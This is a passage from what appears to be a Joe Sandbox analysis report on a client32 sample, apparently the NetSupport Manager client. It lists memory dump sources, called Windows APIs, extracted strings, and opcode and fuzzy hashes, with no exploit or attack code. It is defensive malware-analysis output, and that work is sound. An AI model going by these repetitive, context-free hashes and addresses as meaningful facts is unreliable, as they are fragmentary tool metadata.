                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FindMessageSendWindow
                                                                                                                                                                                                    • String ID: MSOfficeWClass
                                                                                                                                                                                                    • API String ID: 1741975844-970895155
                                                                                                                                                                                                    • Opcode ID: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
                                                                                                                                                                                                    • Instruction ID: 17eb5a188d88a84c71184668e46e9585b6c12665a03152ba016c754b78296158
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BD0127035035977E6001AA2DD4EF99BB5CDB44B55F118024F706AA0C1DBB0B440876A
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000), ref: 689CDAE4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event
                                                                                                                                                                                                    • String ID: Refcount.cpp$this->hReadyEvent
                                                                                                                                                                                                    • API String ID: 4201588131-2118820724
                                                                                                                                                                                                    • Opcode ID: 816bf2680387b887fe89294b5721b6937131c348ac3c88f761490cfb3486788c
                                                                                                                                                                                                    • Instruction ID: 44d02eadb1469f327cad3bd9ac49bc2801ff14e9dff98613eb674d1f8b4740a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 816bf2680387b887fe89294b5721b6937131c348ac3c88f761490cfb3486788c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFD02231A88210BFC7249A64B809FCA32AC4F80315F404038F00A62100C7B4F84ACB82
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenu.USER32(00000000), ref: 1101D064
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1101D053
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D04E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1590435379-2830328467
                                                                                                                                                                                                    • Opcode ID: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
                                                                                                                                                                                                    • Instruction ID: a479ae3ba71ad1bbfd929d5f192baf473b643c420dccf9ee561c4944f6f7f77e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51D022B5E0023AABC320E611ECC8FC6B2A85B00318F044468F12062000E678E480C380
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MenuProp
                                                                                                                                                                                                    • String ID: OldMenu
                                                                                                                                                                                                    • API String ID: 601939786-3235417843
                                                                                                                                                                                                    • Opcode ID: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
                                                                                                                                                                                                    • Instruction ID: 521654fc19124d4f771c6bc11addf53dd8358c346f2b3ea316e48a946e839c39
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96C0123260653D7782421A959D85ACEF76CAD162653008062FA10A2100F724551187EA
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111E8DEC,00000000,?,?,1100C15B,00000000,00000000), ref: 1100D79F
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111E8DEC,?,?,1100C15B,00000000,00000000), ref: 1100D810
                                                                                                                                                                                                      • Part of subcall function 1100D700: EnterCriticalSection.KERNEL32(111E8DEC,?,?,1100B4CC,?), ref: 1100D709
                                                                                                                                                                                                      • Part of subcall function 1100D700: LeaveCriticalSection.KERNEL32(111E8DEC,?,1100B4CC,?), ref: 1100D781
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111E8DEC), ref: 1100D7DF
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111E8DEC), ref: 1100D7FB
                                                                                                                                                                                                      • Part of subcall function 1100D6B0: EnterCriticalSection.KERNEL32(111E8DEC,1100C3EB), ref: 1100D6B5
                                                                                                                                                                                                      • Part of subcall function 1100D6B0: LeaveCriticalSection.KERNEL32(111E8DEC), ref: 1100D6EF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2978645861-0
                                                                                                                                                                                                    • Opcode ID: f66ecf3714c859a81cdc4bb94732644680549d43e4677b6ab0f5a47de0aac6d5
                                                                                                                                                                                                    • Instruction ID: 2708ec326fc7ce8a95e5e2d6ee606d17e2d645df98342fd5c938547174611261
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f66ecf3714c859a81cdc4bb94732644680549d43e4677b6ab0f5a47de0aac6d5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8401843AE121399BE701EFE59C4899DBBACEB096A5B0041A5FD0CD3240E631AD0087F2